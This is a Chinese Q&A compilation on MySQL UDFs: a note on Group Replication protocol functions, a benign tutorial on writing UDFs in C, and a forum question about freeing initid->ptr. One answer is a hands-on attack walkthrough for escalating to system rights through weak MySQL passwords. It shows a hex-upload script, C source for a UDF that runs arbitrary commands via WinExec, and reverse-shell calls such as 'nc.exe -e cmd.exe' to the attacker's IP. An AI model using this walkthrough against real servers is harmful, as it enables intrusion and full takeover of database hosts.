mysql udf函数怎么调用

Posted 2023-05-10

背景

在上一篇推文中，我们介绍了 mysql Group Replication 8.0.16 支持信息碎片化功能来增强大型事务处理能力。

如果您想在组复制中使用该功能，则任何组成员的版本都不能低于 8.0.16！

简单地说就是由于低版本协议上不支持。MySQL 8.0.16 的组通讯开始支持新协议，简称“分段协议”，之前的版本中只有一种“压缩协议”。

如果多个成员想加入复制组，那么在协议匹配上遵循以下原则：

现有复制组成员和新加入成员版本相同，加入成功。

低版本成员想加入高版本的组会被驱逐，加入失败。

高版本的成员想加入低版本的组，单独加入成功，多个加入失败。

例如：

一个 MySQL Server 8.0.16 实例可以成功加入使用通信协议版本 5.7.24 的组。

一个 MySQL Server 5.7.24 实例无法成功加入使用通信协议版本 8.0.16 的组。

两个 MySQL Server 8.0.16 实例无法同时加入使用通信协议版本 5.7.24 的组。

两个 MySQL Server 8.0.16 实例可以同时加入使用通信协议版本 8.0.16 的组。

新增 UDF

为了能让高版本的复制组更便于加入低版本的成员，MySQL 8.0.16 新增两个 UDF。

您可以使用两个新的 UDF 命令去管理组通信协议：

1. group_replication_set_communication_protocol(new_protocol)

设置组复制通讯协议版本

SELECT group_replication_set_communication_protocol("8.0.15");




填入一个所有成员都支持的版本号，即：new_protocol ≤ 所有成员的 MySQL版本。

new_protocol 格式：major.minor.patch （主版本号.次版本号.发布版本号）例如：8.0.15。

2. group_replication_get_communication_protocol()

获取复制中最旧成员的 MySQL 版本号

SELECT group_replication_get_communication_protocol();    +------------------------------------------------+    | group_replication_get_communication_protocol() |    +------------------------------------------------+    | 5.7.14                                         |    +------------------------------------------------+




获取的版本号可能与设置的值不一致，但不一致的版本之间组复制协议是一样的。

返回结果格式：major.minor.patch （主版本号.次版本号.发布版本号）例如：8.0.15。


以上两个 UDF 对全部组成员有效，主机或从机上均可执行。


结论

若想使用信息碎片功能。建议将组复制成员全部升级为 8.0.16。

若组内成员版本仅有部分为 8.0.16，可以用两个新的函数来让高版本的成员保持与其它成员组协议一致。



请点击输入图片描述

参考技术A 1）基本用户定义函数是一类代码，对MYSQL服务器功能进行扩充，通过添加新函数，性质就象使用本地MYSQL函数abs()或concat().UDF是用C（或C++）写的。也许还可以用BASIC，.NET或其它什么虽然还没见过有人这么做。
2）从字面上何以知道UDF是很有用的，尤其当需要扩展MYSQL服务器功能时。下表给出了最佳解决方法的比较：
Method Speed Language Development
方法 速度 语言 开发
Stored Procedures slow SQL ~minutes (for small functions)
存储过程 慢 SQL ~分钟（对于小函数）
UDF fast C ~hour
UDF 快 C ~小时
Native Function fast C major pain in the ***
本地函数 快 C 未知
慢的意思是和其它比较时。存储过程和一般SQL语句比仍然是很快的。
对本地函数的一点解释：本质上和UDF没太大区别。但是必须用MYSQL的资源代码来写然后重新编译全部。这将是很大的工作量，必须一边又一边的用最新版的MYSQL来完成这项工作。
3）这部分很简单。当完成了一个UDF，只是使用它就可以了。例如："SELECT MyFunction(data1, data2) FROM table"
4）编写UDF
现在开发写一个UDF：
建立一个新的shared-library项目（该例中用的VC++ 6.0建立一个标准的DLL）
首先需要一些头文件。这些头文件是标准的头文件和MYSQL服务器的包含目录里的文件
#ifdef STANDARD
/* STANDARD is defined, don't use any mysql functions */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifdef __WIN__
typedef unsigned __int64 ulonglong; /* Microsofts 64 bit types */
typedef __int64 longlong;
#else
typedef unsigned long long ulonglong;
typedef long long longlong;
#endif /*__WIN__*/
#else
#include <my_global.h>
#include <my_sys.h>
#endif
#include <mysql.h>
#include <ctype.h>
static pthread_mutex_t LOCK_hostname;
现在必须决定需要哪类函数。本质上有两种选择：
该函数是聚合函数吗？（后面将学习很多关于聚合函数的内容）
返回类型是什么？有4个选择：
类型 描述
STRING 一个合法的字符串，转换成char*类型
INTEGER 一个普通的整型变量，转换成64位的整型
REAL型 一个俘点数，转换成double型
DECIAML型 这个并没真正的结束，MYSQL将做字符串对待
现在开始讨论关于非聚合函数。必须声明并执行一些MYSQL使用UDF时用到的函数，但首先一些必要的结构必须并确：
UDF_INIT:
类型 名称 描述
<code>
my_bool maybe_null 是1如果函数能返回NULL
unsigned int decimals 针对REAL函数
unsigned long max_length 针对字符串函数
char * ptr 自由指针针对函数的数据
my_bool const_item 0如果结果是独立的

UDF_ARGS:
类型 名称 描述
unsigned int arg_count 成员数量
enum Item_result * arg_type 成员类型的数组
char ** args 指向成员的指针的数组
unsigned long * lengths 成员长度的数组（针对字符串）
char * maybe_null "maybe_null"标记的数组
char ** attributes 指向成员属性的指针的数组
unsigned long * attribute_lengths 属性长度数组

现在看一下该函数：
De-/Initialization:

Collapseextern "C" my_bool MyTest_init(UDF_INIT *initid, UDF_ARGS *args,
char *message)


//非常重要的一件事是建立内存
//需要
//需要一个很长的变量来保存检测数
//虽然该例中不需要
longlong* i = new longlong; // 建立变量
*i = 0; // 设初值

//指针变量中保存为一个字符指针
//确认不会遇到类型问题
initid->ptr = (char*)i;

//检测成员的格式
if (args->arg_count != 1)

strcpy(message,"MyTest() requires one arguments");
return 1;


if (args->arg_type[0] != INT_RESULT)

strcpy(message,"MyTest() requires an integer");
return 1;

return 0;


extern "C" void MyTest_deinit(UDF_INIT *initid)


//这里必须清空所分配的内存
//引入函数
delete (longlong*)initid->ptr;


The actual function:

extern "C" longlong MyTest(UDF_INIT *initid, UDF_ARGS *args,
char *is_null, char *error)

/*最后这是实际的工作部分。该函数为每个记录调用，返回值或指向当前值的指针保存在UDF_ARGS变量中。必须获得值，完成计算并返回值。注意可以通过UDF_INIT变量进入MyTest_init中分配的内存，该例中将为每个值设置为5
*/
return *((longlong*)args->args[0])+5;

全部完成！现在必须编译连接库，然后将其拷贝到操作系统可以加载的目录下。通常在WINDOWS里是系统变量的定义路径。个人使用的是MYSQL服务器的bin目录。必须确认该目录是其它MYSQL不能访问的。然后确认所有MYSQL需要的函数功能。
必须告诉MYSQL，这必须直接了当：执行以下SQL指令：
CREATE [AGGREGATE] FUNCTION MyTest
RETURNS [INTEGER|STRING|REAL|DECIMAL] SONAME the_libraries_exact_name
现在可以想使用其他函数一样使用它了。
5）成员函数：
现在说一下成员函数。当的UDF是个成员函数，必须增加一些函数，一些函数在不同的方式中使用。调用次序是：
调用yTest_init来分配内存（就象一般的UDF一样）
MYSQL将表分类是通过GROUP BY
每组里的第一行调用MyTest_clear
每组里的第一列调用 MyTest_add
在组改变后或最后一列改变后调用MyTest得到结果
重复3到5直到所有列被处理。
调用MyTest_deinit清空内存
现在让看一下新的聚合函数所需的函数。该例中将简单的添加所有的值。（就象本地SUM函数）
void MyTest_clear(UDF_INIT *initid, char *is_null, char *error)


/*为每个新组重新将总数设置为0，当然必须分配一个longlong类型变量在在init函数中，并分配给指针
*/
*((longlong*)initid->ptr) = 0;


void MyTest_add(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)


//为每列将当前值添加到总数
*((longlong*)initid->ptr) = *((longlong*)initid->ptr) +
*((longlong*)args->args[0]);


longlong MyTest(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)


//最后返回总值
return *((longlong*)initid->ptr);


6）更进一步的问题：
在写一些复杂的UDF时需要注意几个问题：
一个字符串函数应该返回一个指向结果的指针并且设置*result和*length作为目录和返回值的长度值。例如：
memcpy(result, "result string", 13);
*length = 13;
MyTest建立的结果缓冲区是255字节。如果的结果保存在里面。不必担心结果的内存分配问题。
如果的字符串函数需要返回一个大于255字节长度的字符串。必须用malloc或新的MyTest_init或MyTest函数分配，然后用MyTest_deinit释放它。能用UDF_INIT的指针保存分配的内存地址，并在MyTest中重用。
在主函数中指定一个错误返回，设置 *error为1：如果MyTest()为任何列将*error设置为1，则函数的值是NULL针对于当前列，以及对任何的通过MyTest()被调用的声明中并发的列请求。
想了解更多内容看一下MYSQL在线帮助。

7）一些指导方针：
如果确实希望的UDF运行良好，这里有一些建议：）
不要在UDF中调用任何其他的程序或进程
不要保存任何的本地信息。（这些在普通的库里已经共享）
不要分配任何的全局或静态的变量。
始终检测成员的类型。就象MYSQL将所有类型都转换为字符类型。如果将一个字符类型转换成整型指针可能会出错。
特别注意内存的分配。如果有内存泄漏问题会使服务器彻底崩溃！

8）调式UDF
调试UDF需要勇气因为如果UDF有问题，每次都会使整个MYSQL服务器死掉。所以写了一个命令行工具，来围绕这个问题工作。仅仅运行它，它会模仿"SELECT"调用指令将结果保存到库文件中，可以打印所有的结果行。所以当UDF存在一些错误只是该程序崩溃而不会是整个服务器。 参考技术B 很早网上就有了用mysql弱口令得到webshell教程，但是这次我要说的不是得到webshell，而是直接得到系统权限，看清楚了，是“直接”得到！

首先，我简单说一下mysql弱口令得到系统权限得过程：首先利用mysql脚本上传udf dll文件，然后利用注册UDF
DLL中自写的Function函数，而执行任意命令。

思路很简单，网上也有一些教程，但是他们要么没有给具体的代码，要么一句话代过，搞得象我似得小菜很难理解，终于在我付出了几天得不断测试得辛勤劳动后，有了点结果，我把详细过程和相关代码得交给大家，这样大家就可以自己写dll文件，自己生成不同文件得二进制码啦！

下面，我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码（网友Mix用的方法）：
set @a =
concat('',0x0123abc1312389…..);
set @a = concat(@a,0x4658978abc545e……);

………………….

create table Mix(data LONGBLOB);//建表Mix,字段为data，类型为longblob

insert into Mix values("");update Mix set data = @a;//@a插入表Mix
select
data from Mix into DUMPFILE 'C:\\Winnt\\文件名';//导出表中内容为文件

前两句很熟悉把，这个就是我们以前注入的时候，绕过’的解决办法，把代码的16进制数声明给一个变量，然后导入这个变量就行了。只不过这里，因为16进制代码是一个文件的内容，代码太长了，所以就用了concat函数不断把上次得代码类加起来，这样不断累计到一个变量a中。后面几句就很简单了，我都有注释。

后面三句好说，但是前面的那么多16进制数据，手工的话，累人啊！不过你还记得以前有一个exe2bat.vbs脚本吗？这次我们可以把这个脚本修改一下后，得到我们这里需要得mysql脚本！对比exe2bat.vbs生成得文件和我们需要脚本的文件格式，我们可以轻松的得到我们所需的脚本。脚本内容如下：

fp=wscript.arguments(0
fn=right(fp,len(fp)-instrrev(fp,"\"))
with
createobject("adodb.stream")
.type=1:.open:.loadfromfile
fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536

with
createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true)

.write "set @a = concat('',0x"
for i=1 to sl
bt=ascb(midb(str,i,1))

if bt<16 then .write "0"
.write hex(bt)
if i mod 128=0 then
.write ");" vbcrlf "set @a = concat(@a,0x"
next
end with

好了，现在只要你把所要上传的文件拖到这个脚本图标上面，就可以生成一个同名的txt文件了。这个txt文件，就是我们所需要的mysql脚本，当然我们还需要修改一下这个txt文件（毕竟他是我们偷工减料得来的！），把最后一行生成的多余的那句“set
@a = concat('',0x”删除了，加上建表，插值得那三句代码即可！

脚本生成了，如何上传？先登陆mysql服务器：

C:\>mysql –u root –h hostip –p
Mysql>use mysql;
//先进入mysql默认得数据库，否则你下一步的表将不知道属于哪个库
Mysql>\. E:\*.dll.txt;
//这儿就是你生成的mysql脚本
按照上面输入命令，就可以看见屏幕文字飞快闪烁（当然网速要快啦），不一会你的文件旧上传完毕了！

下面到达我们的重点，我们上传什么dll文件？就目前我再网上看到的有两个已经写好的dll文件，一个是Mix写得mix.dll，一个是envymask写得my_udf.dll,这两个我都用过，都很不错，但是都也有点不足。先来看看具体的使用过程吧！

先用mix.dll:
登陆mysql,输入命令：
Mysql> \. e:\mix.dll.txt;
Mysql>
CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\windows\\mix.dll';

//这儿的注册的Mixconnect就是在我们dll文件中实现的函数，我们将要用他执行系统命令！
Mysql> select
Mixconnect('你的ip','8080'); //填写你的反弹ip和端口

过一会儿，你监听8080端口的nc，就会得到一个系统权限的shell了！如图1：

这个的确不错，通过反弹得到得shell可以传过一些防火墙，可惜的是，它的这个函数没有写得很好，只能执行一次，当你第二次连接数据库后，再次运行“select
Mixconnect('你的ip','8080');”的时候，对方的mysql会当掉！报错，然后服务停止！

所以，使用mix.dll你只有一次成功，没有再来一次的机会！另外根据我的测试，他对Win2003的系统好像不起作用。
再用my_udf.dll：

Mysql>\. C:\my_udf.dll.txt
Mysql> CREATE FUNCTION my_udfdoor
RETURNS STRING SONAME 'C:\\winnt\\my_udf.dll';

//同样地，my_udfdoor也是我们注册后，用来执行系统命令得函数
Mysql> select my_udfdoor('’);
//这儿可以随便写my_udfdoor得参数，相当于我们只是要激活这个函数
好了，现在你可以不用关这个shell了，我们再开一个cmd，使用：

D:\>nc hostip 3306
*
4.0.*-nt x$Eo~MCG f**k //看到这个后，输入“f**k”
,他是my_udfdoor默认密码，自己无法更改
过一会儿，你就有了系统权限的shell了，
由于他是hook
recv版，所以穿墙的能力很强，我是在上一个mix.dll反弹失败的情况下，才使用这个得，他果然不负所望！进系统后，发现它有双网卡，天网防火墙个人版V2.73，对外仅仅开放3306端口，由此可见，my_udf.dll确实有很强的穿透防火墙得能力！但是他也有一个bug,就是再我们连接激活这个函数后（就是使用了命令“select
my_udfdoor('’);”后），不管你是否连接，只要执行了:
Mysql>drop function my_udfdoor;
后，mysql也汇报错，然后挂掉，

所以，你使用这个dll文件无法删除你的痕迹！

最后，然我们自己写一个自定义的dll文件。看能不能解决问题。

我们仅仅使用mysql 得udf的示例作模版即可！看他的示例：

#include <stdlib.h>
#include <winsock.h>
#include
<mysql.h>
extern "C"
char *my_name(UDF_INIT *initid, UDF_ARGS
*args, char *is_null,

char *error);
// 兼容C

char
*my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,

char *error)


char * me = "my name";
return me;
// 调用此UDF将返回 my name


十分简单吧？好，我们只需要稍微改一下就可以有了自己的dll文件了：
下面是我的一个哥们Crackme是修改的：
#include
<stdlib.h>
#include <windows.h>
#include "mysql.h"

extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS
*args, char *is_null, char *error);// sys_name就是函数名，你可以任意修改

__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char
*is_null, char *error) //当然这儿的sys_name也得改！

char me[256] = 0;
if
(args->arg_count == 1)
strncpy(me,args->args[0],args->lengths[0]);

me[args->lengths[0]]='\0';
WinExec(me,SW_HIDE); //就是用它来执行任意命令

else
strcpy(me,"do nonthing.\n");
return me;


好，我们编译成sysudf.dll文件就可以了！我们来用他实验一把！
看操作：
Mysql>\.
C:\sysudf.dll.txt
Mysql>Create function sys_name returns string soname
'C:\\windows\\sysudf.dll';
Mysql>\. Nc.exe.txt //把nc.exe也上传上去

Mysql>select sys_name('nc.exe -e cmd.exe 我的ip 8080');

//sys_name参数只有一个，参数指定要执行的系统命令
好，看看在Win2003中的一个反弹shell了，

当然，我们你也可以不反弹shell了，而去执行其他命令，只不过不论是否执行成功，都没有回显，所以要保证命令格式正确。对于这个dll文件，经过测试，不论何时“drop
function
sys_name;”，都是不会报错的，同时也可以多次运行不同命令。至于他的缺点，就是他的穿墙能力跟Mix.dll一样不算太强，但对于实在穿不透的墙，直接运行其他命令就是最好的选择了。

上面三个dll文件可谓各有所短，如何选择，就看你遇到的实际情况了。

好了，从脚本得编写使用到dll文件编写使用，说了这么多，现在大家应该都会了吧？题目说的是弱口令得到系统权限，但是如果你在注入等其他过程中，爆出了config.php中的mysql密码，不也是可以使用的吗？这样我们岂不是也找到继Serv-u后又一大提权方法了吗？本回答被提问者和网友采纳

删除 initid->ptr、MySQL 聚合函数 (UDF) 时失去与 MySQL 服务器的连接

【中文标题】删除 initid->ptr、MySQL 聚合函数 (UDF) 时失去与 MySQL 服务器的连接

【英文标题】：Lost connection to MySQL server when deleting initid->ptr, MySQL aggregate function (UDF)

【发布时间】：2021-01-16 21:45:49

【问题描述】：

我在 C++ 中创建了一个 MySQL 聚合 UDF。 我从 MySQL 聚合 UDF 的最终函数返回 char*。 在void xxx_deinit(UDF_INIT initid) 中，我正在释放我的函数使用的所有内存。 我通过删除init->ptr来释放内存。

我的 deinit 函数：

extern "C" void xxx_deinit(UDF_INIT * initid)

    delete initid->ptr;

在 init 函数中，我像这样初始化ptr：

extern "C" bool xxx_init(UDF_INIT * initid, UDF_ARGS * args, char* message)

    const char*  demo = "demo";

    initid->ptr = (char*) demo;

    return 0;

我能够创建 UDF 并将其安装在 MySQL 服务器中。 安装后，当我尝试调用该函数时，会弹出如下错误消息：

Error Code: 2013. Lost connection to MySQL server during query

但是当我从xxx_deinit(UDF_INIT * initid) 函数中删除行：delete initid->ptr; 时，我得到了所需的输出。 但我猜这是错误的方法，因为它会导致内存泄漏。 此外，同样的语句：delete initid->ptr; 在返回类型为 char* 的简单 UDF 的情况下不会产生错误。 谁能告诉我我在这里做错了什么？ 任何形式的帮助或建议都会有很大帮助。 提前致谢。

谁能帮我解决这个问题。

【参考方案1】：

没有内存泄漏，因为"demo" 是指向静态内存的指针。

您正在尝试 delete 指向未使用 new 分配的内存的指针。您的运行时完全有权炸毁。

最简单的解决方案是简单地删除 deinit 函数中的 delete。如果你总是在那里放一个静态字符串，那就足够了。

或者，您可以切换到动态分配ptr 成员的内存。在初始化函数中：

initid->ptr = strdup("demo");

在deinit函数中：

free(initid->ptr);

请注意，我们使用free 而不是delete，因为strdup 使用malloc 分配内存。永远不要越过new/delete 和malloc/free！

【讨论】：

那你建议我应该怎么做？

你能给我一些建议吗？

为我的答案添加了两种方式。

试过什么？你附加了调试器吗？它在哪里崩溃？

不，这是明显的内存泄漏。您丢弃了对已分配内存的唯一引用。